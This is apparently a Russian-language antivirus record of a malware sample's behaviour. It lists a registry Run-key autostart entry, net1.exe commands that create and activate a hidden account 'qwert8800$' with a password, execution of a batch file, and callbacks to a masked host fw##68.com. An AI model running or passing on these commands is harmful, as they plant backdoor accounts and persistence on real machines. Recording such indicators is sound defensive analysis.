Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '<SYSTEM32>\svchost.exe'
- <SYSTEM32>\net1.exe localgroup %USERNAME%s qwert8800$ /add
- <SYSTEM32>\net1.exe user qwert8800$ /active:yes
- <SYSTEM32>\cmd.exe /c <SYSTEM32>\123.bat
- <SYSTEM32>\net1.exe user qwert8800$ QQ398358887 /add
- <SYSTEM32>\123.bat
- 'fw##68.com':80
- fw##68.com/QWERT8800/qq.asp?qq##########################################################
- DNS ASK fw##68.com
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Indicator' WindowName: ''